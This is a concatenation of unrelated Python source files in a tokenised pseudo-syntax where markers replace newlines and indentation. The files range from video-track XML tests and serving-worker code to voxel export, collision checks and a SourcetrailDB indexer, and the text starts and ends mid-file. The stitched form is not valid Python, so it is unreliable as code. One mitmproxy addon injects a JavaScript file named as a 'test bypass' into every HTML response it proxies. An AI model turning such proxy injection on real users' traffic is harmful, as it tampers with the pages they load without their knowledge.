'pathurl')<line_sep>pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot1.mov'<line_sep>pathurl_node.text=pathurl<line_sep>t=Track()<line_sep>t.from_xml(track_node)<line_sep>self.assertEqual(<false> t.locked)<line_sep>self.assertEqual(<true> t.enabled)<line_sep># clip1
c=t.clips[0]<line_sep>self.assertEqual(35 c.end)<line_sep>self.assertEqual('shot2' c.name)<line_sep>self.assertEqual(<true> c.enabled)<line_sep>self.assertEqual(1 c.start)<line_sep>self.assertEqual(0 c.in_)<line_sep>self.assertEqual(34 c.duration)<line_sep>self.assertEqual(34 c.out)<line_sep>f=c.file<line_sep>self.assertEqual(34 f.duration)<line_sep>self.assertEqual('shot2' f.name)<line_sep>self.assertEqual('file://localhost/home/eoyilmaz/maya/projects/default/data/shot2.mov' f.pathurl)<line_sep># clip2
c=t.clips[1]<line_sep>self.assertEqual(65 c.end)<line_sep>self.assertEqual('shot' c.name)<line_sep>self.assertEqual(<true> c.enabled)<line_sep>self.assertEqual(35 c.start)<line_sep>self.assertEqual(0 c.in_)<line_sep>self.assertEqual(30 c.duration)<line_sep>self.assertEqual(30 c.out)<line_sep>f=c.file<line_sep>self.assertEqual(30 f.duration)<line_sep>self.assertEqual('shot' f.name)<line_sep>self.assertEqual('file://localhost/home/eoyilmaz/maya/projects/default/data/shot.mov' f.pathurl)<line_sep># clip3
c=t.clips[2]<line_sep>self.assertEqual(110 c.end)<line_sep>self.assertEqual('shot1' c.name)<line_sep>self.assertEqual(<true> c.enabled)<line_sep>self.assertEqual(65 c.start)<line_sep>self.assertEqual(0 c.in_)<line_sep>self.assertEqual(45 c.duration)<line_sep>self.assertEqual(45 c.out)<line_sep>f=c.file<line_sep>self.assertEqual(45 f.duration)<line_sep>self.assertEqual('shot1' f.name)<line_sep>self.assertEqual('file://localhost/home/eoyilmaz/maya/projects/default/data/shot1.mov' f.pathurl)<block_end><def_stmt>test_optimize_clips_is_working_properly self<block_start>"""testing if the optimize_clips method will optimize the clips to use
the same file node if the file pathurls are same
"""<line_sep>t=Track()<line_sep>t.enabled=<true><line_sep>t.locked=<false><line_sep># clip 1
f=File()<line_sep>f.duration=34<line_sep>f.name='shot2'<line_sep>f.pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot2.mov'<line_sep>c=Clip()<line_sep>c.id='shot2'<line_sep>c.start=1<line_sep>c.end=35<line_sep>c.name='shot2'<line_sep>c.enabled=<true><line_sep>c.duration=34<line_sep>c.in_=0<line_sep>c.out=34<line_sep>c.file=f<line_sep>t.clips.append(c)<line_sep># clip 2
f=File()<line_sep>f.duration=30<line_sep>f.name='shot'<line_sep>f.pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot2.mov'<line_sep>c=Clip()<line_sep>c.id='shot'<line_sep>c.start=35<line_sep>c.end=65<line_sep>c.name='shot'<line_sep>c.enabled=<true><line_sep>c.duration=30<line_sep>c.in_=0<line_sep>c.out=30<line_sep>c.file=f<line_sep>t.clips.append(c)<line_sep># clip 3
f=File()<line_sep>f.duration=45<line_sep>f.name='shot1'<line_sep>f.pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot1.mov'<line_sep>c=Clip()<line_sep>c.id='shot1'<line_sep>c.start=65<line_sep>c.end=110<line_sep>c.name='shot1'<line_sep>c.enabled=<true><line_sep>c.duration=45<line_sep>c.in_=0<line_sep>c.out=45<line_sep>c.file=f<line_sep>t.clips.append(c)<line_sep># check if the file objects are different
self.assertNotEqual(t.clips[0].file t.clips[1].file)<line_sep>self.assertNotEqual(t.clips[0].file t.clips[2].file)<line_sep>self.assertNotEqual(t.clips[1].file t.clips[2].file)<line_sep># now optimize the clips
t.optimize_clips()<line_sep># check if the file[0] and file[1] is the same file node
# and the file[2] is different than the others
self.assertEqual(t.clips[0].file t.clips[1].file)<line_sep>self.assertNotEqual(t.clips[0].file t.clips[2].file)<line_sep>self.assertNotEqual(t.clips[1].file t.clips[2].file)<block_end><def_stmt>test_to_xml_method_with_optimized_clips_is_working_properly self<block_start>"""testing if the to xml method is working properly with the clips are
optimized
"""<line_sep>t=Track()<line_sep>t.enabled=<true><line_sep>t.locked=<false><line_sep># clip 1
f=File()<line_sep>f.duration=34<line_sep>f.name='shot2'<line_sep>f.pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot2.mov'<line_sep>c=Clip()<line_sep>c.id='shot2'<line_sep>c.start=1<line_sep>c.end=35<line_sep>c.name='shot2'<line_sep>c.enabled=<true><line_sep>c.duration=34<line_sep>c.in_=0<line_sep>c.out=34<line_sep>c.file=f<line_sep>t.clips.append(c)<line_sep># clip 2
f=File()<line_sep>f.duration=30<line_sep>f.name='shot'<line_sep>f.pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot2.mov'<line_sep>c=Clip()<line_sep>c.id='shot2'<line_sep>c.start=35<line_sep>c.end=65<line_sep>c.name='shot2'<line_sep>c.enabled=<true><line_sep>c.duration=30<line_sep>c.in_=0<line_sep>c.out=30<line_sep>c.file=f<line_sep>t.clips.append(c)<line_sep># clip 3
f=File()<line_sep>f.duration=45<line_sep>f.name='shot1'<line_sep>f.pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot1.mov'<line_sep>c=Clip()<line_sep>c.id='shot1'<line_sep>c.start=65<line_sep>c.end=110<line_sep>c.name='shot1'<line_sep>c.enabled=<true><line_sep>c.duration=45<line_sep>c.in_=0<line_sep>c.out=45<line_sep>c.file=f<line_sep>t.clips.append(c)<line_sep>expected_xml="""<track>
<locked>FALSE</locked>
<enabled>TRUE</enabled>
<clipitem id="shot2">
<end>35</end>
<name>shot2</name>
<enabled>True</enabled>
<start>1</start>
<in>0</in>
<duration>34</duration>
<out>34</out>
<file id="shot2.mov">
<duration>34</duration>
<name>shot2</name>
<pathurl>file://localhost/home/eoyilmaz/maya/projects/default/data/shot2.mov</pathurl>
</file>
</clipitem>
<clipitem id="shot2 2">
<end>65</end>
<name>shot2</name>
<enabled>True</enabled>
<start>35</start>
<in>0</in>
<duration>30</duration>
<out>30</out>
<file id="shot2.mov"/>
</clipitem>
<clipitem id="shot1">
<end>110</end>
<name>shot1</name>
<enabled>True</enabled>
<start>65</start>
<in>0</in>
<duration>45</duration>
<out>45</out>
<file id="shot1.mov">
<duration>45</duration>
<name>shot1</name>
<pathurl>file://localhost/home/eoyilmaz/maya/projects/default/data/shot1.mov</pathurl>
</file>
</clipitem>
</track>"""<line_sep>t.optimize_clips()<line_sep>self.assertEqual(expected_xml t.to_xml())<block_end><block_end> |
# Author: <NAME> <<EMAIL>>; <NAME> <<EMAIL>>; <NAME> <<EMAIL>>
# License: BSD-3-Claus
<class_stmt>Params(object)<block_start><def_stmt>__init__ self<block_start>"""
The basic class for storing the parameters in the probabilistic model
"""<line_sep>super(Params self).__init__()<block_end><block_end><class_stmt>Basic_Model(object)<block_start><def_stmt>__init__ self *args **kwargs<block_start>"""
The basic model for all probabilistic models in this package
Attributes:
@public:
global_params : [Params] the global parameters of the probabilistic model
local_params : [Params] the local parameters of the probabilistic model
@private:
_model_setting : [Params] the model settings of the probabilistic model
_hyper_params : [Params] the hyper parameters of the probabilistic model
"""<line_sep>super(Basic_Model self).__init__()<line_sep>setattr(self 'global_params' Params())<line_sep>setattr(self 'local_params' Params())<line_sep>setattr(self '_model_setting' Params())<line_sep>setattr(self '_hyper_params' Params())<block_end><block_end> |
# Copyright 2017 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module is for testing pyfakefs
:py:class:`fake_filesystem_unittest.Patcher`. It defines attributes that have
the same names as file modules, sudh as 'io` and `path`. Since these are not
modules, :py:class:`fake_filesystem_unittest.Patcher` should not patch them.
Whenever a new module is added to
:py:meth:`fake_filesystem_unittest.Patcher._findModules`, the corresponding
attribute should be added here and in the test
:py:class:`fake_filesystem_unittest_test.TestAttributesWithFakeModuleNames`.
"""<line_sep>os='os attribute value'<line_sep>path='path attribute value'<line_sep>pathlib='pathlib attribute value'<line_sep>shutil='shutil attribute value'<line_sep>io='io attribute value'<line_sep> |
<import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep>process=cms.Process("Demo")<line_sep>process.load("Configuration.Geometry.GeometryExtended2015Reco_cff")<line_sep>process.load("Geometry.RPCGeometry.rpcGeometry_cfi")<line_sep>process.maxEvents=cms.untracked.PSet(input=cms.untracked.int32(1))<line_sep>process.source=cms.Source("EmptySource")<line_sep>process.MessageLogger=cms.Service("MessageLogger")<line_sep>process.demo=cms.EDAnalyzer("RPCGEO")<line_sep>process.p=cms.Path(process.demo)<line_sep> |
<import_stmt>torch<import_from_stmt>torch.autograd Variable<import_from_stmt>ptstat.core RandomVariable _to_v<line_sep># TODO: Implement Uniform(a, b) constructor.
<class_stmt>Uniform(RandomVariable)<block_start>"""
Uniform(0, 1) iid rv.
"""<def_stmt>__init__ self size cuda=<false><block_start>super(Uniform self).__init__()<assert_stmt>len(size)<eq>2 str(size)<line_sep>self._cuda=cuda<line_sep>self._p_size=size<block_end><def_stmt>_size self<block_start><return>self._p_size<block_end><def_stmt>_log_pdf self x<block_start><return>self._entropy()<block_end><def_stmt>_sample self# TODO: Use CUDA random_ when implemented.
<block_start>y=Variable(torch.FloatTensor(*self._p_size).uniform_())<if_stmt>self._cuda<block_start>y=y.cuda()<block_end><return>y<block_end><def_stmt>_entropy self<block_start><return>_to_v(0 self._p_size[0] self._cuda)<block_end><block_end> |
<def_stmt>remove_whilespace_nodes node unlink=<false><block_start>"""Removes all of the whitespace-only text decendants of a DOM node.
When creating a DOM from an XML source, XML parsers are required to
consider several conditions when deciding whether to include
whitespace-only text nodes. This function ignores all of those
conditions and removes all whitespace-only text decendants of the
specified node. If the unlink flag is specified, the removed text
nodes are unlinked so that their storage can be reclaimed. If the
specified node is a whitespace-only text node then it is left
unmodified."""<line_sep>remove_list=[]<for_stmt>child node.childNodes<block_start><if_stmt>child.nodeType<eq>dom.Node.TEXT_NODE<and><not>child.data.strip()<block_start>remove_list.append(child)<block_end><elif_stmt>child.hasChildNodes()<block_start>remove_whilespace_nodes(child unlink)<block_end><block_end><for_stmt>node remove_list<block_start>node.parentNode.removeChild(node)<if_stmt>unlink<block_start>node.unlink()<block_end><block_end><block_end> |
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Start worker process with single core servable"""<import_stmt>os<import_stmt>time<import_stmt>threading<import_stmt>signal<import_stmt>argparse<import_stmt>psutil<import_stmt>mindspore_serving.log<as>logger<import_from_stmt>mindspore_serving.server worker<import_from_stmt>mindspore_serving.server.common check_type<import_from_stmt>mindspore_serving._mindspore_serving ExitSignalHandle_<import_from_stmt>mindspore_serving._mindspore_serving Worker_<line_sep>_main_thread_exited=<false><def_stmt>start_listening_parent_thread servable_name device_id<block_start>"""listening to parent process status"""<def_stmt>worker_listening_parent_thread <block_start>parent_process=psutil.Process(os.getppid())<while_stmt>parent_process.is_running()<and><not>ExitSignalHandle_.has_stopped()<block_start>time.sleep(0.1)<block_end>logger.warning(f"Worker {servable_name} device_id {device_id}, detect parent "<concat>f"pid={parent_process.pid} has exited or receive Ctrl+C message, worker begin to exit"<concat>f", parent running {parent_process.is_running()}, exit status {ExitSignalHandle_.has_stopped()}")<line_sep>worker.stop()<line_sep>cur_process=psutil.Process(os.getpid())<for_stmt>_ range(100)# 100x0.1=10s
<block_start><try_stmt><block_start>children=cur_process.children(recursive=<true>)<if_stmt><not>children<and>_main_thread_exited<block_start>logger.info(f"All current children processes have exited")<line_sep><break><block_end><for_stmt>child children<block_start>os.kill(child.pid signal.SIGTERM)<block_end>time.sleep(0.1)<block_end># pylint: disable=broad-except
<except_stmt>Exception<as>e<block_start>logger.warning(f"Kill children catch exception {e}")<block_end><block_end><block_end>thread=threading.Thread(target=worker_listening_parent_thread)<line_sep>thread.start()<block_end><def_stmt>start_worker servable_directory servable_name version_number device_type device_id master_address dec_key dec_mode listening_master=<false><block_start>"""Start worker process with single core servable"""<line_sep>signal.signal(signal.SIGCHLD signal.SIG_DFL)# for ccec compiler
check_type.check_str('servable_directory' servable_directory)<line_sep>check_type.check_str('servable_name' servable_name)<line_sep>check_type.check_int('version_number' version_number 0)<line_sep>check_type.check_str('device_type' device_type)<line_sep>check_type.check_int('device_id' device_id 0)<line_sep>check_type.check_str('master_address' master_address)<line_sep>check_type.check_bool('listening_master' listening_master)<line_sep>ExitSignalHandle_.start()# Set flag to running and receive Ctrl+C message
<if_stmt>listening_master<block_start>start_listening_parent_thread(servable_name device_id)<block_end># for servable_config.py to get device id of current worker.
os.environ["SERVING_DEVICE_ID"]=str(device_id)<line_sep>worker_pid=os.getpid()<line_sep>unix_socket_dir="unix_socket_files"<try_stmt><block_start>os.mkdir(unix_socket_dir)<block_end><except_stmt>FileExistsError<block_start><pass><block_end>worker_address=f"unix:{unix_socket_dir}/serving_worker_{servable_name}_device{device_id}_{worker_pid}"<if_stmt>len(worker_address)<g>107# maximum unix domain socket address length
<block_start>worker_address=worker_address[:50]+"___"+worker_address[-50:]<block_end><try_stmt><block_start>worker.start_servable(servable_directory=servable_directory servable_name=servable_name version_number=version_number device_type=device_type device_id=device_id master_address=master_address worker_address=worker_address dec_key=dec_key dec_mode=dec_mode)<block_end><except_stmt>Exception<as>ex<block_start>Worker_.notify_failed(master_address f"{{servable name:{servable_name}, device id:{device_id}, <{ex}>}}")<line_sep><raise><block_end><block_end><def_stmt>parse_args_and_start <block_start>"""Parse args and start distributed worker"""<line_sep>parser=argparse.ArgumentParser(description="Serving start extra worker")<line_sep>parser.add_argument('--servable_directory' type=str required=<true> help="servable directory")<line_sep>parser.add_argument('--servable_name' type=str required=<true> help="servable name")<line_sep>parser.add_argument('--version_number' type=int required=<true> help="version numbers")<line_sep>parser.add_argument('--device_type' type=str required=<true> help="device type")<line_sep>parser.add_argument('--device_id' type=str required=<true> help="device id")<line_sep>parser.add_argument('--master_address' type=str required=<true> help="master address")<line_sep>parser.add_argument('--dec_key_pipe_file' type=str required=<true> help="dec key pipe file")<line_sep>parser.add_argument('--dec_mode' type=str required=<true> help="dec mode")<line_sep>parser.add_argument('--listening_master' type=str required=<true> help="whether listening master")<line_sep>args=parser.parse_args()<line_sep>servable_directory=args.servable_directory<line_sep>servable_name=args.servable_name<line_sep>version_number=int(args.version_number)<line_sep>device_type=args.device_type<line_sep>device_id=int(args.device_id)<line_sep>master_address=args.master_address<line_sep>dec_key_pipe=args.dec_key_pipe_file<if_stmt>dec_key_pipe<ne>"None"<block_start><with_stmt>open(dec_key_pipe "rb")<as>fp<block_start>dec_key=fp.read()<block_end>prefix="serving_temp_dec_"<if_stmt>dec_key_pipe[:len(prefix)]<eq>prefix<block_start>os.remove(dec_key_pipe)<block_end><block_end><else_stmt><block_start>dec_key=<none><block_end>dec_mode=args.dec_mode<line_sep># pylint: disable=simplifiable-if-expression
listening_master=<true><if>args.listening_master.lower()<eq>"true"<else><false><try_stmt><block_start>start_worker(servable_directory servable_name version_number device_type device_id master_address dec_key dec_mode listening_master)<block_end><finally_stmt><block_start><global>_main_thread_exited<line_sep>_main_thread_exited=<true><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>parse_args_and_start()<block_end> |
"""
========================================================================
Test sources
========================================================================
Test sources with CL or RTL interfaces.
Author : <NAME>
Date : Mar 11, 2019
"""<import_from_stmt>collections deque<import_from_stmt>copy deepcopy<import_from_stmt>pymtl3 *<import_from_stmt>pymtl3.stdlib.ifcs OutValRdyIfc<class_stmt>TestSrcRTL(Component)<block_start><def_stmt>construct s Type msgs initial_delay=0 interval_delay=0# Interface
<block_start>s.out=OutValRdyIfc(Type)<line_sep># Data
s.msgs=deepcopy(msgs)<line_sep># TODO: use wires and ROM to make it translatable
s.idx=0<line_sep>s.num_msgs=len(s.msgs)<line_sep>s.count=0<line_sep>@update_ff<def_stmt>up_src <block_start><if_stmt>s.reset<block_start>s.idx=0<line_sep>s.count=initial_delay<line_sep>s.out.val<auglshift>0<block_end><else_stmt><block_start><if_stmt>s.out.val&s.out.rdy<block_start>s.idx<augadd>1<line_sep>s.count=interval_delay<block_end><if_stmt>s.count<g>0<block_start>s.count<augsub>1<line_sep>s.out.val<auglshift>0<block_end><else_stmt># s.count == 0
<block_start><if_stmt>s.idx<l>s.num_msgs<block_start>s.out.val<auglshift>1<line_sep>s.out.msg<auglshift>s.msgs[s.idx]<block_end><else_stmt><block_start>s.out.val<auglshift>0<block_end><block_end><block_end><block_end><block_end><def_stmt>done s<block_start><return>s.idx<ge>s.num_msgs<block_end># Line trace
<def_stmt>line_trace s<block_start><return>f"{s.out}"<block_end><block_end> |
<import_from_future_stmt> absolute_import division print_function<import_from_stmt>six.moves range<def_stmt>intify a<block_start><return>tuple([int(round(val))<for>val a])<block_end><def_stmt>reference_map sg mi<block_start><import_from_stmt>cctbx sgtbx<line_sep>asu=sgtbx.reciprocal_space_asu(sg.type())<line_sep>isym_=[]<line_sep>mi_=[]<for_stmt>hkl mi<block_start>found=<false><for_stmt>i_inv range(sg.f_inv())<block_start><for_stmt>i_smx range(sg.n_smx())<block_start>rt_mx=sg(0 i_inv i_smx)<line_sep>hkl_=intify(hkl<times>rt_mx.r())<if_stmt>asu.is_inside(hkl_)<block_start>mi_.append(hkl_)<if_stmt>i_inv<block_start>isym_.append(-i_smx)<block_end><else_stmt><block_start>isym_.append(i_smx)<block_end>found=<true><line_sep><break><block_end><block_end><block_end><if_stmt>found<block_start><continue><block_end><else_stmt><block_start><assert_stmt>(<not>sg.is_centric())<block_end><for_stmt>i_inv range(sg.f_inv())<block_start><for_stmt>i_smx range(sg.n_smx())<block_start>rt_mx=sg(0 i_inv i_smx)<line_sep>_hkl=[-h<for>h hkl]<line_sep>mhkl_=intify(_hkl<times>rt_mx.r())<if_stmt>asu.is_inside(mhkl_)<block_start>mi_.append(mhkl_)<line_sep>isym_.append(-i_smx)<line_sep>found=<true><line_sep><break><block_end><block_end><block_end><block_end><return>mi_ isym_<block_end><def_stmt>tst_map_to_asu_isym anomalous_flag<block_start><import_from_stmt>cctbx sgtbx<import_from_stmt>cctbx.miller map_to_asu_isym<import_from_stmt>cctbx.array_family flex<line_sep>mi=flex.miller_index()<line_sep>i=flex.int()<import_stmt>random<line_sep>nhkl=1000<for_stmt>j range(nhkl)<block_start>hkl=[random.randint(-10 10)<for>j range(3)]<line_sep>mi.append(hkl)<line_sep>i.append(0)<block_end>spacegroup=sgtbx.space_group_symbols(195).hall()<line_sep>sg=sgtbx.space_group(spacegroup)<line_sep>mi_,isym_=reference_map(sg mi)<line_sep>map_to_asu_isym(sg.type() anomalous_flag mi i)<for_stmt>j range(nhkl)<block_start><assert_stmt>(i[j]<eq>isym_[j])<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>tst_map_to_asu_isym(<true>)<line_sep>tst_map_to_asu_isym(<false>)<line_sep>print('OK')<block_end> |
<import_from_stmt>bs4 BeautifulSoup<import_from_stmt>mitmproxy ctx<line_sep># load in the javascript to inject
<with_stmt>open('injected-test-bypasses.js' 'r')<as>f<block_start>content_js=f.read()<block_end><def_stmt>response flow# only process 200 responses of html content
<block_start><if_stmt>flow.response.headers['Content-Type']<ne>'text/html'<block_start><return><block_end><if_stmt><not>flow.response.status_code<eq>200<block_start><return><block_end># inject the script tag
html=BeautifulSoup(flow.response.text 'lxml')<line_sep>container=html.head<or>html.body<if_stmt>container<block_start>script=html.new_tag('script' type='text/javascript')<line_sep>script.string=content_js<line_sep>container.insert(0 script)<line_sep>flow.response.text=str(html)<line_sep>ctx.log.info('Successfully injected the injected-test-bypasses.js script.')<block_end><block_end> |
<class_stmt>Cell<block_start><def_stmt>__init__ self c=' '<block_start>self.c=c<line_sep>self.highlight={}<block_end><def_stmt>__mul__ self n<block_start><return>[Cell(self.c)<for>i range(n)]<block_end><def_stmt>__str__ self<block_start><return>self.c<block_end><block_end><class_stmt>Highlight<block_start><def_stmt>__init__ self line highlight<block_start>self.line=line<line_sep>self.highlight=highlight<line_sep>self.start=0<line_sep>self.end=0<block_end><def_stmt>s self<block_start><return>(self.line self.start self.end tuple(self.highlight.items()))<block_end><def_stmt>__eq__ self h<block_start><return>self.s()<eq>h.s()<block_end><def_stmt>__hash__ self<block_start><return>hash((self.line self.start self.end tuple(self.highlight.items())))<block_end><block_end><class_stmt>Screen<block_start><def_stmt>__init__ self<block_start>self.x=0<line_sep>self.y=0<line_sep>self.resize(1 1)<line_sep>self.highlight={}<line_sep>self.changes=0<block_end><def_stmt>resize self w h<block_start>self.w=w<line_sep>self.h=h<line_sep># TODO: should resize clear?
self.screen=[Cell()<times>w<for>i range(h)]<line_sep>self.scroll_region=[0 self.h 0 self.w]<line_sep># clamp cursor
self.x=min(self.x w-1)<line_sep>self.y=min(self.y h-1)<block_end><def_stmt>clear self<block_start>self.resize(self.w self.h)<block_end><def_stmt>scroll self dy<block_start>ya,yb=self.scroll_region[0:2]<line_sep>xa,xb=self.scroll_region[2:4]<line_sep>yi=(ya yb)<if_stmt>dy<l>0<block_start>yi=(yb ya-1)<block_end><for_stmt>y range(yi[0] yi[1] int(dy/abs(dy)))<block_start><if_stmt>ya<le>y+dy<l>yb<block_start>self.screen[y][xa:xb]=self.screen[y+dy][xa:xb]<block_end><else_stmt><block_start>self.screen[y][xa:xb]=Cell()<times>(xb-xa)<block_end><block_end><block_end><def_stmt>redraw self updates<block_start>blacklist=['mode_change' 'bell' 'mouse_on' 'highlight_set' 'update_fb' 'update_bg' 'update_sp' 'clear' ]<line_sep>changed=<false><for_stmt>cmd updates<block_start><if_stmt><not>cmd<block_start><continue><block_end>name,args=cmd[0] cmd[1:]<if_stmt>name<eq>'cursor_goto'<block_start>self.y,self.x=args[0]<block_end><elif_stmt>name<eq>'eol_clear'<block_start>changed=<true><line_sep>self.screen[self.y][self.x:]=Cell()<times>(self.w-self.x)<block_end><elif_stmt>name<eq>'put'<block_start>changed=<true><for_stmt>cs args<block_start><for_stmt>c cs<block_start>cell=self.screen[self.y][self.x]<line_sep>cell.c=c<line_sep>cell.highlight=self.highlight<line_sep>self.x<augadd>1<line_sep># TODO: line wrap is not specified, neither is wrapping off the end. semi-sane defaults.
<if_stmt>self.x<ge>self.w<block_start>self.x=0<line_sep>self.y<augadd>1<if_stmt>self.y<ge>self.h<block_start>self.y=0<block_end><block_end><block_end><block_end><block_end><elif_stmt>name<eq>'resize'<block_start>changed=<true><line_sep>self.resize(*args[0])<block_end><elif_stmt>name<eq>'highlight_set'<block_start>self.highlight=args[0][0]<block_end><elif_stmt>name<eq>'set_scroll_region'<block_start>self.scroll_region=args[0]<block_end><elif_stmt>name<eq>'scroll'<block_start>changed=<true><line_sep>self.scroll(args[0][0])<block_end><elif_stmt>name<in>blacklist<block_start><pass><block_end># else:
# print('unknown update cmd', name)
<block_end><if_stmt>changed<block_start>self.changes<augadd>1<block_end><block_end><def_stmt>highlights self<block_start>hlset=[]<for_stmt>y,line enumerate(self.screen)<block_start>cur={}<line_sep>h=<none><for_stmt>x,cell enumerate(line)<block_start><if_stmt>h<and>cur<and>cell.highlight<eq>cur<block_start>h.end=x+1<block_end><else_stmt><block_start>cur=cell.highlight<if_stmt>cur<block_start>h=Highlight(y cur)<line_sep>h.start=x<line_sep>h.end=x+1<line_sep>hlset.append(h)<block_end><block_end><block_end><block_end><return>hlset<block_end><def_stmt>p self<block_start>print('-'<times>self.w)<line_sep>print(str(self))<line_sep>print('-'<times>self.w)<block_end><def_stmt>__setitem__ self xy c<block_start>x,y=xy<try_stmt><block_start>cell=self.screen[y][x]<line_sep>cell.c=c<line_sep>cell.highlight=self.highlight<block_end><except_stmt>IndexError<block_start><pass><block_end><block_end><def_stmt>__getitem__ self y<block_start><if_stmt>isinstance(y tuple)<block_start><return>self.screen[y[1]][y[0]]<block_end><return>''.join(str(c)<for>c self.screen[y])<block_end><def_stmt>__str__ self<block_start><return>'\n'.join([self[y]<for>y range(self.h)])<block_end><block_end> |
<import_from_stmt>voxels VoxelGrid<import_stmt>numpy<as>np<import_stmt>multiprocessing<as>mp<import_from_stmt>multiprocessing Pool<import_stmt>glob<import_stmt>os<import_stmt>argparse<def_stmt>create_voxel_off path<block_start>voxel_path=path+'/voxelization_{}.npy'.format(res)<line_sep>off_path=path+'/voxelization_{}.off'.format(res)<if_stmt>unpackbits<block_start>occ=np.unpackbits(np.load(voxel_path))<line_sep>voxels=np.reshape(occ (res )<times>3)<block_end><else_stmt><block_start>voxels=np.reshape(np.load(voxel_path)['occupancies'] (res )<times>3)<block_end>loc=((min+max)/2 )<times>3<line_sep>scale=max-min<line_sep>VoxelGrid(voxels loc scale).to_mesh().export(off_path)<line_sep>print('Finished: {}'.format(path))<block_end><if_stmt>__name__<eq>'__main__'<block_start>parser=argparse.ArgumentParser(description='Run voxalization to off')<line_sep>parser.add_argument('-res' type=int)<line_sep>args=parser.parse_args()<line_sep>ROOT='shapenet/data'<line_sep>unpackbits=<true><line_sep>res=args.res<line_sep>min=-0.5<line_sep>max=0.5<line_sep>p=Pool(mp.cpu_count())<line_sep>p.map(create_voxel_off glob.glob(ROOT+'/*/*/'))<block_end> |
"""
Author: <NAME>
Created On: 23 August 2017
"""<line_sep># To test if two rectangle intersect, we only have to find out
# if their projections intersect on all of the coordinate axes
<import_stmt>inspect<class_stmt>Coord<block_start>"""Coord
Class to initialize Coordinate of one point
"""<def_stmt>__init__ self x y<block_start>self.x=x<line_sep>self.y=y<block_end><block_end><class_stmt>SimpleRectangle<block_start>"""SimpleRectangle
Class to initialize Body of Object
"""<def_stmt>__init__ self coord1 coord2<block_start>"""
:type coord1: object of class Coord
:type coord2: object of class Coord
"""<line_sep>self.min_x=coord1.x<line_sep>self.min_y=coord1.y<line_sep>self.max_x=coord2.x<line_sep>self.max_y=coord2.y<block_end><block_end><def_stmt>broad_phase simpleRect1 simpleRect2<block_start>"""
:type simpleRect1: object
:type simpleRect2: object
"""<line_sep>d1x=simpleRect2.min_x-simpleRect1.max_x<line_sep>d1y=simpleRect2.min_y-simpleRect1.max_y<line_sep>d2x=simpleRect1.min_x-simpleRect2.max_x<line_sep>d2y=simpleRect1.min_y-simpleRect2.max_y<if_stmt>d1x<g>0<or>d1y<g>0<block_start><return><false><block_end><if_stmt>d2x<g>0<or>d2y<g>0<block_start><return><false><block_end><return><true><block_end><def_stmt>get_code <block_start>"""
returns the code for the broad phase function
"""<line_sep><return>inspect.getsource(broad_phase)<block_end> |
<import_stmt>argparse<import_stmt>os<import_stmt>sourcetraildb<as>srctrl<def_stmt>main <block_start>parser=argparse.ArgumentParser(description="SourcetrailDB Python API Example")<line_sep>parser.add_argument("--database-file-path" help="path to the generated Sourcetrail database file" type=str required=<true>)<line_sep>parser.add_argument("--source-file-path" help="path to the source file to index" type=str required=<true>)<line_sep>parser.add_argument("--database-version" help="database version of the invoking Sourcetrail binary" type=int required=<false> default=0)<line_sep>args=parser.parse_args()<line_sep>databaseFilePath=args.database_file_path<line_sep>sourceFilePath=args.source_file_path.replace("\\" "/")<line_sep>dbVersion=args.database_version<line_sep>print("SourcetrailDB Python API Example")<line_sep>print("Supported database version: "+str(srctrl.getSupportedDatabaseVersion()))<if_stmt>dbVersion<g>0<and>dbVersion<ne>srctrl.getSupportedDatabaseVersion()<block_start>print("ERROR: Only supports database version: "+str(srctrl.getSupportedDatabaseVersion())+". Requested version: "+str(dbVersion))<line_sep><return>1<block_end><if_stmt><not>srctrl.open(databaseFilePath)<block_start>print("ERROR: "+srctrl.getLastError())<line_sep><return>1<block_end>print("Clearing loaded database now...")<line_sep>srctrl.clear()<line_sep>print("start indexing")<line_sep>srctrl.beginTransaction()<line_sep>fileId=srctrl.recordFile(sourceFilePath)<line_sep>srctrl.recordFileLanguage(fileId "python")<if_stmt>len(srctrl.getLastError())<g>0<block_start>print("ERROR: "+srctrl.getLastError())<line_sep><return>1<block_end>symbolId=srctrl.recordSymbol('{ "name_delimiter": ".", "name_elements": [ '<concat>'{ "prefix": "", "name": "MyType", "postfix": "" } '<concat>'] }')<line_sep>srctrl.recordSymbolDefinitionKind(symbolId srctrl.DEFINITION_EXPLICIT)<line_sep>srctrl.recordSymbolKind(symbolId srctrl.SYMBOL_CLASS)<line_sep>srctrl.recordSymbolLocation(symbolId fileId 2 7 2 12)<line_sep>srctrl.recordSymbolScopeLocation(symbolId fileId 2 1 7 1)<line_sep>memberId=srctrl.recordSymbol('{ "name_delimiter": ".", "name_elements": [ '<concat>'{ "prefix": "", "name": "MyType", "postfix": "" }, '<concat>'{ "prefix": "", "name": "my_member", "postfix": "" } '<concat>'] }')<line_sep>srctrl.recordSymbolDefinitionKind(memberId srctrl.DEFINITION_EXPLICIT)<line_sep>srctrl.recordSymbolKind(memberId srctrl.SYMBOL_FIELD)<line_sep>srctrl.recordSymbolLocation(memberId fileId 4 2 4 10)<line_sep>methodId=srctrl.recordSymbol('{ "name_delimiter": ".", "name_elements": [ '<concat>'{ "prefix": "", "name": "MyType", "postfix": "" }, '<concat>'{ "prefix": "", "name": "my_method", "postfix": "" } '<concat>'] 